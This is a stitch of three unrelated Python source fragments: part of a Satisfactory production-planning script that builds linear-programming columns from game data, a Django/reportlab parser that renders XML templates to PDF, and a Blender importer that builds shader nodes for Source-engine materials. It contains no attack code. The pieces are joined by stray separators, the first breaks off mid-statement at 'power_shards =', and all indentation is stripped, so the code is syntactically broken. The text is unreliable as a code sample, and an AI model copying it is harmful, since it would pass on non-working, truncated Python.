for name in (MINER_CLASS, OIL_EXTRACTOR_CLASS, WATER_EXTRACTOR_CLASS, RESOURCE_WELL_PRESSURIZER_CLASS):
miners[name] = parse_miner(class_entries[name])
# pprint(miners)
### Manufacturers ###
def parse_manufacturer(entry):
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"power_consumption": float(entry["mPowerConsumption"]),
"power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
"min_clock": float(entry["mMinPotential"]),
"max_clock_base": float(entry["mMaxPotential"]),
"max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
}
manufacturers = {}
for entry in class_types["FGBuildableManufacturer"]:
manufacturer = parse_manufacturer(entry)
manufacturer["is_variable_power"] = False
manufacturers[entry["ClassName"]] = manufacturer
for entry in class_types["FGBuildableManufacturerVariablePower"]:
manufacturer = parse_manufacturer(entry)
manufacturer["is_variable_power"] = True
manufacturers[entry["ClassName"]] = manufacturer
# pprint(manufacturers)
### Recipes ###
def parse_recipe(entry):
recipe_manufacturer = None
for manufacturer in parse_class_list(entry["mProducedIn"]) or []:
if manufacturer in manufacturers:
recipe_manufacturer = manufacturer
break
# we are only considering automatable recipes
if recipe_manufacturer is None:
return None
rate = 60.0 / float(entry["mManufactoringDuration"])
def item_rates(key):
return [(item, rate * amount) for (item, amount) in find_item_amounts(entry[key])]
vpc_constant = float(entry["mVariablePowerConsumptionConstant"])
vpc_factor = float(entry["mVariablePowerConsumptionFactor"])
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"manufacturer": recipe_manufacturer,
"inputs": item_rates("mIngredients"),
"outputs": item_rates("mProduct"),
"variable_power_consumption": vpc_constant + 0.5 * vpc_factor,
}
recipes = {}
for entry in class_types["FGRecipe"]:
recipe = parse_recipe(entry)
if recipe is not None:
recipes[entry["ClassName"]] = recipe
# pprint(recipes)
### Items ###
def parse_item(entry):
points = int(entry["mResourceSinkPoints"])
return {
"display_name": entry["mDisplayName"],
"form": entry["mForm"],
"points": int(entry["mResourceSinkPoints"]),
"stack_size": STACK_SIZES[entry["mStackSize"]],
"energy": float(entry["mEnergyValue"]),
}
items = {}
# any items not contained in Docs.json
items.update(ADDITIONAL_ITEMS)
for class_type in [
"FGItemDescriptor",
"FGItemDescriptorBiomass",
"FGItemDescriptorNuclearFuel",
"FGResourceDescriptor",
"FGEquipmentDescriptor",
"FGConsumableDescriptor",
]:
for entry in class_types[class_type]:
item = parse_item(entry)
if class_type == "FGItemDescriptorNuclearFuel":
item["nuclear_waste"] = NUCLEAR_WASTE_MAPPINGS[entry["ClassName"]]
item["nuclear_waste_amount"] = float(entry["mAmountOfWaste"])
items[entry["ClassName"]] = item
# pprint(items)
### Generators ###
generators = {}
def parse_generator(entry):
power_production = float(entry["mPowerProduction"])
return {
"display_name": entry["mDisplayName"],
"fuel_classes": parse_class_list(entry["mDefaultFuelClasses"]),
"power_production": power_production,
"power_production_exponent": float(entry["mPowerProductionExponent"]),
"requires_supplemental": (entry["mRequiresSupplementalResource"] == "True"),
"supplemental_to_power_ratio": float(entry["mSupplementalToPowerRatio"]),
}
def parse_geothermal_generator(entry):
# unclear why mVariablePowerProductionConstant=0 in the json;
# it's set to 100.0f in the header, which we will hardcode here
return {
"display_name": entry["mDisplayName"],
"power_production": 100.0 + 0.5 * float(entry["mVariablePowerProductionFactor"]),
}
# coal and fuel generators
for entry in class_types["FGBuildableGeneratorFuel"]:
# exclude biomass generator
if entry["ClassName"] == BIOMASS_GENERATOR_CLASS:
continue
generators[entry["ClassName"]] = parse_generator(entry)
# nuclear power plant
for entry in class_types["FGBuildableGeneratorNuclear"]:
generators[entry["ClassName"]] = parse_generator(entry)
# geothermal generator (special case)
geothermal_generator = parse_geothermal_generator(class_entries[GEOTHERMAL_GENERATOR_CLASS])
# pprint(generators)
### Resources ###
with open(map_info_path, "r") as f:
map_info_raw = json.load(f)
map_info = {}
for tab in map_info_raw["options"]:
if "tabId" in tab:
map_info[tab["tabId"]] = tab["options"]
TOTAL_POWER_SHARDS = 0
for slug_type in map_info["power_slugs"][0]["options"]:
TOTAL_POWER_SHARDS += POWER_SLUG_SHARDS[slug_type["layerId"]] * len(slug_type["markers"])
print(f"TOTAL_POWER_SHARDS: {TOTAL_POWER_SHARDS}")
resources = {}
geysers = {}
def parse_and_add_node_type(node_type):
if "type" not in node_type:
return
item = node_type["type"]
if item in RESOURCE_MAPPINGS:
item = RESOURCE_MAPPINGS[item]
if item is None:
return
output = geysers if item == GEYSER_CLASS else resources
for node_purity in node_type["options"]:
purity = node_purity["purity"]
nodes = node_purity["markers"]
if not nodes:
continue
sample_node = nodes[0]
if "core" in sample_node:
# resource well satellite nodes, map them to cores
for node in nodes:
subtype = find_class_name(node["core"])
resource_id = f"{item}|{subtype}"
if resource_id not in output:
output[resource_id] = {
"resource_id": resource_id,
"item": item,
"subtype": subtype,
"multiplier": 0.0,
"count": 1,
"is_limited": True,
"is_resource_well": True,
"num_satellites": 0,
}
output[resource_id]["multiplier"] += PURITY_MULTIPLIERS[purity]
output[resource_id]["num_satellites"] += 1
else:
# normal nodes, add directly
subtype = purity
resource_id = f"{item}|{subtype}"
assert(resource_id not in output)
output[resource_id] = {
"resource_id": resource_id,
"item": item,
"subtype": subtype,
"multiplier": PURITY_MULTIPLIERS[purity],
"count": len(nodes),
"is_limited": True,
"is_resource_well": False,
}
for node_type in map_info["resource_nodes"]:
parse_and_add_node_type(node_type)
for node_type in map_info["resource_wells"]:
parse_and_add_node_type(node_type)
resources[WATER_CLASS] = {
"resource_id": f"{WATER_CLASS}:extractor",
"item": WATER_CLASS,
"subtype": "extractor",
"multiplier": 1,
"is_limited": False,
"is_resource_well": False,
}
# pprint(resources)
# pprint(geysers)
### LP setup ###
class LPColumn(dict):
def __init__(self, *args, display_info=None, **kwargs):
super().__init__(*args, **kwargs)
self.display_info = display_info
lp_columns = {}
lp_equalities = {}
lp_lower_bounds = {}
def get_power_consumption(machine, clock=1.0, recipe=None):
power_consumption = machine["power_consumption"]
if recipe is not None and machine.get("is_variable_power", False):
power_consumption += recipe["variable_power_consumption"]
return power_consumption * (clock ** machine["power_consumption_exponent"])
def get_miner_for_resource(resource):
item_class = resource["item"]
item = items[item_class]
candidates = []
for miner_class, miner in miners.items():
if ((resource["is_resource_well"]) == (miner_class == RESOURCE_WELL_PRESSURIZER_CLASS)
and item["form"] in miner["allowed_resource_forms"]
and (not miner["only_allow_certain_resources"] or item_class in miner["allowed_resources"])):
candidates.append(miner_class)
if not candidates:
raise RuntimeError(f"could not find miner for resource {item_class}")
elif len(candidates) > 1:
raise RuntimeError(f"more than one miner for resource {item_class}: {candidates}")
return candidates[0]
def get_form_conveyance_limit(form):
if form == "RF_SOLID":
return CONVEYOR_BELT_LIMIT
elif form == "RF_LIQUID" or form == "RF_GAS":
return PIPELINE_LIMIT
else:
assert(False)
def get_max_overclock(machine):
return machine["max_clock_base"] + MACHINE_POWER_SHARD_LIMIT * machine["max_clock_per_power_shard"]
def get_conveyance_limit_clock(item, rate):
conveyance_limit = get_form_conveyance_limit(item["form"])
return math.floor(1000000 * conveyance_limit / rate) / 1000000
def get_max_miner_clock(miner, resource, rate):
max_overclock = get_max_overclock(miner)
if resource["is_resource_well"]:
return max_overclock
item_class = resource["item"]
item = items[item_class]
return min(max_overclock, get_conveyance_limit_clock(item, rate))
def get_max_manufacturer_clock(manufacturer, recipe):
max_clock = get_max_overclock(manufacturer)
for (item_class, rate) in recipe["inputs"]:
max_clock = min(max_clock, get_conveyance_limit_clock(items[item_class], rate))
for (item_class, rate) in recipe["outputs"]:
max_clock = min(max_clock, get_conveyance_limit_clock(items[item_class], rate))
return max_clock
def get_power_shards_needed(machine, clock):
return max(0, math.ceil((clock - machine["max_clock_base"]) / machine["max_clock_per_power_shard"]))
def get_item_display_name(item_class):
if item_class in items:
return items[item_class]["display_name"]
else:
return ADDITIONAL_DISPLAY_NAMES[item_class]
def add_lp_column(column, type_, name, display_name=None, machine_name=None, subtype=None, clock=None):
tokens = [type_, name]
if subtype is not None:
tokens.append(subtype)
if clock is not None:
clock_percent = 100.0 * clock
tokens.append(f"{clock_percent}")
column_id = "|".join(tokens)
display_info = {
"type": type_,
"display_name": display_name or name,
"machine_name": machine_name,
"subtype": subtype,
"clock": clock,
}
lp_columns[column_id] = LPColumn(column, display_info=display_info)
for resource_id, resource in resources.items():
item_class = resource["item"]
item = items[item_class]
miner_class = get_miner_for_resource(resource)
miner = miners[miner_class]
rate = miner["rate"] * resource["multiplier"]
min_clock = miner["min_clock"]
max_clock_base = miner["max_clock_base"]
max_clock = get_max_miner_clock(miner, resource, rate)
resource_var = f"resource|{resource_id}"
item_var = f"item|{item_class}"
clock_choices = {max_clock_base, max_clock}
for clock in args.extra_miner_clocks:
clock = min(max_clock, max(min_clock, clock))
clock_choices.add(clock)
for clock in sorted(clock_choices):
column = {
item_var: clock * rate,
"power_consumption": get_power_consumption(miner, clock=clock),
"machines": 1 + (resource["num_satellites"] if resource["is_resource_well"] else 0),
}
if resource["is_limited"]:
column[resource_var] = -1
power_shards = | |
import logging
from io import BytesIO
from reportlab.lib import pagesizes, colors
from reportlab.lib.units import mm, toLength
from reportlab.lib.enums import TA_RIGHT, TA_CENTER, TA_LEFT, TA_JUSTIFY
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.pdfform import resetPdfForm
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfgen.canvas import Canvas
from reportlab.platypus import Paragraph, Table, Spacer, Image, PageBreak
from reportlab.platypus.doctemplate import SimpleDocTemplate
from svglib.svglib import SvgRenderer
from pdfgen.flowables import TextField, BackgroundImage, PageMarker
import xml.dom.minidom
from django.conf import settings
from pdfgen.barcode import Barcode
from .compat import find, etree
logger = logging.getLogger(__name__)
CSS_DICT = {
'padding-left': 'LEFTPADDING',
'padding-right': 'RIGHTPADDING',
'padding-top': 'TOPPADDING',
'padding-bottom': 'BOTTOMPADDING',
'border-left': 'LINEBEFORE',
'border-right': 'LINEAFTER',
'border-top': 'LINEABOVE',
'border-bottom': 'LINEBELOW',
'text-align': 'alignment',
'font-family': 'fontName',
'font-size': 'fontSize',
'color': 'textColor',
'left': TA_LEFT,
'right': TA_RIGHT,
'center': TA_CENTER,
'justify': TA_JUSTIFY,
}
def _new_draw(self):
self.canv.setLineWidth(0.2*mm)
self.drawPara(self.debug)
def patch_reportlab():
setattr(Paragraph, 'draw', _new_draw)
patch_reportlab()
def debug_print(text):
if settings.DEBUG:
logger.debug(text)
def split_ignore(haystack, needle, ignore_start=None, ignore_end=None):
parts = []
ignore_start = ignore_start or '<![CDATA['
ignore_end = ignore_end or ']]>'
haystack_len, needle_len, ignore_start_len, ignore_end_len = \
len(haystack), len(needle), len(ignore_start), len(ignore_end)
ignore = False
i = 0
pi = -1
while i < haystack_len:
unignored = False
if ignore and i+ignore_end_len <= haystack_len and haystack[i:i+ignore_end_len] == ignore_end:
ignore = False
unignored = True
if not ignore and i+needle_len <= haystack_len and haystack[i:i+needle_len] == needle:
part = haystack[pi+1:i].replace(ignore_start, '').replace(ignore_end, '')
i += needle_len-1
pi = i
parts.append(part)
if not ignore and not unignored and i+ignore_start_len <= haystack_len and \
haystack[i:i+ignore_start_len] == ignore_start:
ignore = True
i += 1
parts.append(haystack[pi+1:].replace(ignore_start, '').replace(ignore_end, ''))
return parts
def inner_xml(e):
return etree.tostring(e).strip()[len(e.tag)+2:-len(e.tag)-3]
def content(e):
return e.text + ''.join(etree.tostring(c) for c in e)
class XmlParser(object):
document = None
styles = None
out_buffer = None
style_stack = None
barcode_library = ''
fonts = {}
#: the Django MEDIA_URL
media_url = ''
#: the Django STATIC_URL
static_url = ''
background = None
footer_flowable = None
footer_on_first_page = False
def __init__(self):
self.styles = getSampleStyleSheet()
self.out_buffer = BytesIO()
self.style_stack = []
self.media_url = getattr(settings, 'MEDIA_URL', '')
self.static_url = getattr(settings, 'STATIC_URL', '')
def get_from_url(self, url):
"""
For a given URL, return the matching path to the directory.
Support MEDIA_URL and STATIC_URL
"""
if self.static_url and url.startswith(self.static_url):
url = url.replace(self.static_url, '', 1)
elif self.media_url and url.startswith(self.media_url):
url = url.replace(self.media_url, '', 1)
return find(url)
def set_background_image(self, canvas, doc):
canvas.saveState()
if self.background:
self.background.draw(canvas, doc)
# Header
# header = Paragraph('This is a multi-line header. It goes on every page. ' * 5, self.styles['Normal'])
# w, h = header.wrap(doc.width, doc.topMargin)
# header.drawOn(canvas, doc.leftMargin, doc.height + doc.topMargin - h)
canvas.restoreState()
def handle_first_page(self, canvas, doc):
self.set_background_image(canvas, doc)
if self.footer_on_first_page:
self.draw_footer(canvas, doc)
def handle_later_pages(self, canvas, doc):
self.set_background_image(canvas, doc)
self.draw_footer(canvas, doc)
def draw_footer(self, canvas, doc):
print('-' * 80)
print('Trying to draw footer...', repr(self.footer_flowable))
if self.footer_flowable is None:
return
canvas.saveState()
w, h = self.footer_flowable.wrap(doc.width, doc.bottomMargin)
self.footer_flowable.drawOn(canvas, doc.leftMargin, doc.bottomMargin - h)
canvas.restoreState()
def merge_parts(self, parts):
if self.document is not None:
self.document.build(
parts,
onFirstPage=self.handle_first_page,
onLaterPages=self.handle_later_pages
)
output_data = self.out_buffer.getvalue()
self.out_buffer.close()
return output_data
else:
return None
def parse(self, buffer):
resetPdfForm() # work around for stupid global state in reportlab
parts = self.parse_parts(buffer)
return self.merge_parts(parts)
def parse_parts(self, buffer):
xdoc = etree.fromstring(buffer)
return list(self.parse_element(xdoc))
def parse_element(self, e):
try:
method = getattr(self, e.tag, self.parse_children)
for i in method(e):
if isinstance(i, BackgroundImage):
# save the background image, don't add it to render list
self.background = i
continue
else:
yield i
except TypeError:
# some elements are not strings, like Comment
pass
def parse_children(self, e):
for c in e:
for i in self.parse_element(c):
yield i
PAGE_SIZES_MAPPING = {
'A0': pagesizes.A0,
'A1': pagesizes.A1,
'A2': pagesizes.A2,
'A3': pagesizes.A3,
'A4': pagesizes.A4,
'A5': pagesizes.A5,
'A6': pagesizes.A6,
'B0': pagesizes.B0,
'B1': pagesizes.B1,
'B2': pagesizes.B2,
'B3': pagesizes.B3,
'B4': pagesizes.B4,
'B5': pagesizes.B5,
'B6': pagesizes.B6,
'LETTER': pagesizes.LETTER,
'LEGAL': pagesizes.LEGAL,
'ELEVENSEVENTEEN': pagesizes.ELEVENSEVENTEEN,
}
def doc(self, e):
fmt = e.get('format', 'A4')
raw_margins = e.get('margin', '2cm, 2cm, 2cm, 2cm')
title = e.get('title')
if ',' in fmt:
w, h = (toLength(i.strip()) for i in fmt.split(','))
fmt = (w, h)
else:
fmt = self.PAGE_SIZES_MAPPING.get(fmt.upper(), pagesizes.A4)
top_margin, right_margin, bottom_margin, left_margin = (toLength(i.strip()) for i in raw_margins.split(','))
def make_canvas(*args, **kwargs):
canvas = Canvas(*args, **kwargs)
canvas.setLineWidth(0.25)
return canvas
if self.document is None:
self.document = SimpleDocTemplate(self.out_buffer,
pagesize=fmt,
title=title,
topMargin=top_margin,
leftMargin=left_margin,
rightMargin=right_margin,
bottomMargin=bottom_margin,
canvasmaker=make_canvas)
for i in self.parse_children(e):
yield i
def style(self, e):
name = e.get('name')
source_name = e.get('base', None)
def_dict = dict(e.attrib)
del def_dict['name']
if 'base' in def_dict:
del def_dict['base']
new_dict = {}
for k in def_dict.keys():
v = def_dict[k]
nk = CSS_DICT.get(k, k)
# translate v
v = CSS_DICT.get(v, v)
if nk == 'fontSize' or nk == 'leading':
v = toLength(v)
elif nk == 'color':
v = colors.HexColor(int('0x' + v[1:], 0))
new_dict[nk] = v
if 'leading' not in new_dict and 'fontSize' in new_dict:
new_dict['leading'] = new_dict['fontSize'] * 1.5 # + 2.0
if source_name is not None:
source_dict = self.styles[source_name].__dict__.copy()
source_dict.update(new_dict)
new_dict = source_dict
new_dict.update({'name': name})
if name in self.styles:
self.styles[name].__dict__.update(new_dict)
else:
self.styles.add(ParagraphStyle(**new_dict))
# make this function an empty generator
if False:
yield # noqa
def font(self, e):
name = e.get('name')
path = e.get('src')
self.import_pdf_font(path, name)
if False:
yield # noqa
def div(self, e):
style = e.get('style', None)
if style is not None:
self.style_stack.append(self.styles[style])
parts = list(self.parse_children(e))
if style is not None:
self.style_stack.pop()
for i in parts:
yield i
def p(self, e):
data = inner_xml(e)
para = Paragraph(data, self.style_stack[-1] if len(self.style_stack) > 0 else self.styles['Normal'])
yield para
def textfield(self, e): # noqa
name = e.get('name')
value = e.get('value')
width = int(e.get('width', "100"))
height = int(e.get('height', "20"))
yield TextField(name, width, height, value)
def tstyle(self, e): # noqa
area = e.get('area', '0:-1')
top_left, bottom_right = (list(int(q) for q in p.split(',')) for p in area.split(':'))
top = top_left[0]
left = top_left[-1]
bottom = bottom_right[0]
right = bottom_right[-1]
cells = [(top, left), (bottom, right)]
tstyle_dict = dict(e.attrib)
if 'area' in tstyle_dict:
del tstyle_dict['area']
if 'border' in tstyle_dict:
border = tstyle_dict['border']
tstyle_dict.update({'border-left': border,
'border-right': border,
'border-top': border,
'border-bottom': border
})
del tstyle_dict['border']
if 'padding' in tstyle_dict:
padding = tstyle_dict['padding']
tstyle_dict.update({'padding-left': padding,
'padding-right': padding,
'padding-top': padding,
'padding-bottom': padding
})
del tstyle_dict['padding']
for key in tstyle_dict.keys():
value = tstyle_dict[key]
desc = CSS_DICT.get(key, key.upper())
params = value.split(',')
for i in range(len(params)):
param = params[i].strip()
if param[0] == '#':
params[i] = colors.HexColor(int('0x' + param[1:], 0))
else:
try:
floatval = toLength(param)
params[i] = floatval
except ValueError:
params[i] = param.upper()
yield [desc] + cells + params
def tr(self, e):
for c in e:
if c.tag == 'td':
yield list(self.parse_children(c)) if len(c) else None
def table(self, e):
cols = [toLength(i.strip()) for i in e.get('cols').split(',')]
align = e.get('align', 'left').upper()
repeatrows = int(e.get('repeatrows', '0'))
tstyles = []
rows = []
for c in e:
if c.tag == 'tstyle':
tstyles += list(self.tstyle(c))
else:
rows.append(list(self.parse_element(c)))
table_obj = Table(rows, cols, hAlign=align, style=tstyles, repeatRows=repeatrows)
yield table_obj
def pagebreak(self, e): # noqa
yield PageBreak()
def pagemarker(self, e): # noqa
yield PageMarker(name=e.get('name'), description=content(e))
def footer(self, e):
self.footer_flowable = list(self.parse_children(e))[0]
self.footer_on_first_page = e.get('firstpage', 'false').lower() in ('true', '1')
if False:
yield # noqa
def spacer(self, e): # noqa
width = toLength(e.get('width', '1pt'))
height = toLength(e.get('height'))
yield Spacer(width, height)
def vector(self, e):
scale = float(e.get('scale', '1.0'))
width = toLength(e.get('width'))
height = toLength(e.get('height'))
path = e.get('src')
search = e.get('search', None)
replace = e.get('replace', None)
fh = open(self.get_from_url(path), 'rb')
data = fh.read()
fh.close()
if search is not None:
data = data.replace(search, replace)
svg = xml.dom.minidom.parseString(data).documentElement
svg_renderer = SvgRenderer('')
svg_obj = svg_renderer.render(svg)
svg_obj.scale(scale, scale)
svg_obj.asDrawing(width, height)
yield svg_obj
def img(self, e):
width = toLength(e.get('width'))
height = toLength(e.get('height'))
path = e.get('src')
align = e.get('align', 'left').upper()
background = e.get('background', 'False') == 'True'
v_align = e.get('vertical-align', 'BOTTOM').upper()
if background:
img_obj = BackgroundImage(
filename=self.get_from_url(path),
width=width,
height=height,
hAlign=align,
vAlign=v_align)
else:
img_obj = Image(filename=self.get_from_url(path), width=width, height=height)
img_obj.hAlign = align
yield img_obj
def barcode(self, e):
scale = float(e.get('scale', '1.0'))
width = toLength(e.get('width'))
height = toLength(e.get('height'))
value = e.get('value')
align = e.get('align', 'left').upper()
barcode_type = e.get('type', 'datamatrix')
barcode_obj = Barcode(library=self.barcode_library,
width=width,
height=height,
data=value,
scale=scale,
type=barcode_type,
align=align.lower())
barcode_obj.hAlign = align
yield barcode_obj
def import_pdf_font(self, base_name, face_name):
if self.fonts.get(face_name, None) is None:
afm = find(base_name + '.afm')
pfb = find(base_name + '.pfb')
ttf = find(base_name + '.ttf')
if afm:
try:
face = pdfmetrics.EmbeddedType1Face(afm, pfb)
pdfmetrics.registerTypeFace(face)
font = pdfmetrics.Font(face_name, face_name, 'WinAnsiEncoding')
pdfmetrics.registerFont(font)
except: # noqa
pass
elif ttf:
pdfmetrics.registerFont(TTFont(face_name, ttf))
| |
from vmfpy import vmt
from vmfpy.fs import VMFFileSystem
from .utils import truncate_name, is_invisible_tool, fallback_material
from typing import NamedTuple, Dict, DefaultDict, Set, Tuple, Optional, Union, Any, Iterator, Iterable, List, Callable
from abc import ABC, abstractmethod
from collections import defaultdict
import traceback
import bpy
from bpy.types import NodeTree, NodeSocket, Node
from . import import_vtf
class VMTData(NamedTuple):
width: int
height: int
material: bpy.types.Material
class _PosRef():
def __init__(self, x: int = 0, y: int = 0) -> None:
self.x = x
self.y = y
def loc(self, x: int = 0, y: int = 0) -> Tuple[int, int]:
return (self.x + x, self.y + y)
def copy(self, x: int = 0, y: int = 0) -> '_PosRef':
return _PosRef(self.x + x, self.y + y)
class _MaterialInputBase(ABC):
def __init__(self, required_inputs: Iterable['_MaterialInputBase'] = ()) -> None:
self.node: Node = None
self.required_inputs = list(required_inputs)
self.dimension_x = 0
self.dimension_y = 0
@abstractmethod
def create(self, node_tree: NodeTree, pos: _PosRef) -> None:
pass
def full_create(self, node_tree: NodeTree, pos: _PosRef, created_inputs: Set['_MaterialInputBase']) -> None:
pos.x -= self.dimension_x
required_input_pos = pos.copy()
for required_input in self.required_inputs:
if required_input in created_inputs:
continue
dimension_y = required_input.full_dimension_y(created_inputs)
required_input.full_create(node_tree, required_input_pos.copy(), created_inputs)
required_input_pos.y -= dimension_y
self.create(node_tree, pos)
created_inputs.add(self)
def full_dimension_y(self, created_inputs: Set['_MaterialInputBase']) -> int:
return max(
self.dimension_y,
sum(
required_input.full_dimension_y(created_inputs) for required_input in self.required_inputs
if required_input not in created_inputs
)
)
def __hash__(self) -> int:
return hash(id(self))
class _MaterialInputSocket():
def __init__(self, primary_input: _MaterialInputBase, output: Any):
self.primary_input = primary_input
self.output_name = output
def connect(self, node_tree: NodeTree, input_s: NodeSocket) -> None:
node_tree.links.new(self.primary_input.node.outputs[self.output_name], input_s)
class _MaterialNode():
def __init__(self, node_name: str, output_name: Union[str, int],
input_name: Union[str, int], used_inputs: Iterable[_MaterialInputSocket] = ()):
self._node_name = node_name
self._output_name = output_name
self._input_name = input_name
self.used_inputs: List[_MaterialInputBase] = [socket.primary_input for socket in used_inputs]
self.dimension_x = 0
self.dimension_y = 0
def connect_inputs(self, node_tree: NodeTree) -> None:
return
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
self.node: Node = node_tree.nodes.new(self._node_name)
self.node.location = pos.loc()
node_tree.links.new(self.node.outputs[self._output_name], input_s)
return self.node.inputs[self._input_name]
class _MaterialNodePath():
def __init__(self, min_start_y: int = 0) -> None:
self.min_start_y = min_start_y
self.nodes: List[_MaterialNode] = []
self.input: Optional[_MaterialInputSocket] = None
self.const: Optional[Any] = None
def append(self, node: _MaterialNode) -> None:
self.nodes.append(node)
def dimension_x(self) -> int:
if self.input is None:
return 0
return sum(node.dimension_x for node in self.nodes)
def dimension_y(self) -> int:
return max((node.dimension_y for node in self.nodes), default=0)
def connect_path(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> Iterator[_MaterialInputBase]:
if self.input is None:
if self.const is not None:
input_s.default_value = self.const
return
yielded_inputs: Dict[_MaterialInputBase, _MaterialInputBase] = {}
for node in reversed(self.nodes):
pos.x -= node.dimension_x
input_s = node.connect(node_tree, input_s, pos)
yield from (yielded_inputs.setdefault(inp, inp) for inp in node.used_inputs if inp not in yielded_inputs)
self._input_s = input_s
self._input_pos = pos
if self.input.primary_input not in yielded_inputs:
yield self.input.primary_input
def connect_inputs(self, node_tree: NodeTree) -> None:
if self.input is None:
return
self.input.connect(node_tree, self._input_s)
for node in self.nodes:
node.connect_inputs(node_tree)
class _DXNormalMapConverterMaterialNode(_MaterialNode):
def __init__(self) -> None:
super().__init__('ShaderNodeCombineRGB', 'Image', 'G')
self.dimension_x = 600
self.dimension_y = 200
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
separate_node: Node = node_tree.nodes.new('ShaderNodeSeparateRGB')
separate_node.location = pos.loc()
invert_node: Node = node_tree.nodes.new('ShaderNodeMath')
invert_node.location = pos.loc(200)
invert_node.operation = 'SUBTRACT'
invert_node.inputs[0].default_value = 1.0
node_tree.links.new(separate_node.outputs['G'], invert_node.inputs[1])
g_input = super().connect(node_tree, input_s, pos.copy(400))
node_tree.links.new(separate_node.outputs['R'], self.node.inputs['R'])
node_tree.links.new(invert_node.outputs[0], g_input)
node_tree.links.new(separate_node.outputs['B'], self.node.inputs['B'])
return separate_node.inputs['Image']
class _NormalMapMaterialNode(_MaterialNode):
def __init__(self) -> None:
super().__init__('ShaderNodeNormalMap', 'Normal', 'Color')
self.dimension_x = 200
self.dimension_y = 200
class _InvertMaterialNode(_MaterialNode):
def __init__(self) -> None:
super().__init__('ShaderNodeMath', 0, 1)
self.dimension_x = 200
self.dimension_y = 200
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
input_s = super().connect(node_tree, input_s, pos)
self.node.operation = 'SUBTRACT'
self.node.inputs[0].default_value = 1.0
return input_s
class _MultiplyMaterialNode(_MaterialNode):
def __init__(self, factor: float) -> None:
super().__init__('ShaderNodeMath', 0, 0)
self.factor = factor
self.dimension_x = 200
self.dimension_y = 200
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
input_s = super().connect(node_tree, input_s, pos)
self.node.operation = 'MULTIPLY'
self.node.inputs[1].default_value = self.factor
return input_s
class _MultiplyRGBMaterialNode(_MaterialNode):
def __init__(self, color: Union[Tuple[float, float, float], _MaterialInputSocket],
factor: Union[float, _MaterialInputSocket] = 1) -> None:
inputs = []
if isinstance(color, _MaterialInputSocket):
inputs.append(color)
if isinstance(factor, _MaterialInputSocket):
inputs.append(factor)
super().__init__('ShaderNodeMixRGB', 'Color', 'Color1', inputs)
self.color = color
self.factor = factor
self.dimension_x = 200
self.dimension_y = 250
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
input_s = super().connect(node_tree, input_s, pos)
self.node.blend_type = 'MULTIPLY'
if not isinstance(self.factor, _MaterialInputSocket):
self.node.inputs['Fac'].default_value = self.factor
if not isinstance(self.color, _MaterialInputSocket):
self.node.inputs['Color2'].default_value = (self.color[0], self.color[1], self.color[2], 1)
return input_s
def connect_inputs(self, node_tree: NodeTree) -> None:
if isinstance(self.factor, _MaterialInputSocket):
self.factor.connect(node_tree, self.node.inputs['Fac'])
if isinstance(self.color, _MaterialInputSocket):
self.color.connect(node_tree, self.node.inputs['Color2'])
class _SubtractMaterialNode(_MaterialNode):
def __init__(self, value: float) -> None:
super().__init__('ShaderNodeMath', 0, 0)
self.value = value
self.dimension_x = 200
self.dimension_y = 200
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
input_s = super().connect(node_tree, input_s, pos)
self.node.operation = 'SUBTRACT'
self.node.inputs[1].default_value = self.value
return input_s
class _SsbumpToNormalMaterialNode(_MaterialNode):
def __init__(self) -> None:
super().__init__('ShaderNodeNormalMap', 0, 1)
self.dimension_x = 1300
self.dimension_y = 600
def connect(self, node_tree: NodeTree, input_s: NodeSocket, pos: _PosRef) -> NodeSocket:
input_s = super().connect(node_tree, input_s, pos.copy(1150, 0))
add_node: Node = node_tree.nodes.new('ShaderNodeVectorMath')
add_node.location = pos.loc(1000, 0)
add_node.operation = 'ADD'
add_node.inputs[1].default_value = (0.5, 0.5, 0.5)
node_tree.links.new(add_node.outputs[0], input_s)
multiply_node: Node = node_tree.nodes.new('ShaderNodeVectorMath')
multiply_node.location = pos.loc(850, 0)
multiply_node.operation = 'MULTIPLY'
multiply_node.inputs[1].default_value = (0.5, 0.5, 0.5)
node_tree.links.new(multiply_node.outputs[0], add_node.inputs[0])
normalize_node: Node = node_tree.nodes.new('ShaderNodeVectorMath')
normalize_node.location = pos.loc(700, 0)
normalize_node.operation = 'NORMALIZE'
node_tree.links.new(normalize_node.outputs[0], multiply_node.inputs[0])
add_node2: Node = node_tree.nodes.new('ShaderNodeVectorMath')
add_node2.location = pos.loc(550, 0)
add_node2.operation = 'ADD'
node_tree.links.new(add_node2.outputs[0], normalize_node.inputs[0])
add_node1: Node = node_tree.nodes.new('ShaderNodeVectorMath')
add_node1.location = pos.loc(400, 0)
add_node1.operation = 'ADD'
node_tree.links.new(add_node1.outputs[0], add_node2.inputs[0])
multiply_node_x: Node = node_tree.nodes.new('ShaderNodeVectorMath')
multiply_node_x.location = pos.loc(200, 0)
multiply_node_x.operation = 'MULTIPLY'
multiply_node_x.inputs[1].default_value = (0.81649661064147949, 0.0, 0.57735025882720947)
node_tree.links.new(multiply_node_x.outputs[0], add_node1.inputs[0])
multiply_node_y: Node = node_tree.nodes.new('ShaderNodeVectorMath')
multiply_node_y.location = pos.loc(200, 200)
multiply_node_y.operation = 'MULTIPLY'
multiply_node_y.inputs[1].default_value = (-0.40824833512306213, 0.70710676908493042, 0.57735025882720947)
node_tree.links.new(multiply_node_y.outputs[0], add_node1.inputs[1])
multiply_node_z: Node = node_tree.nodes.new('ShaderNodeVectorMath')
multiply_node_z.location = pos.loc(200, 400)
multiply_node_z.operation = 'MULTIPLY'
multiply_node_z.inputs[1].default_value = (-0.40824821591377258, -0.7071068286895752, 0.57735025882720947)
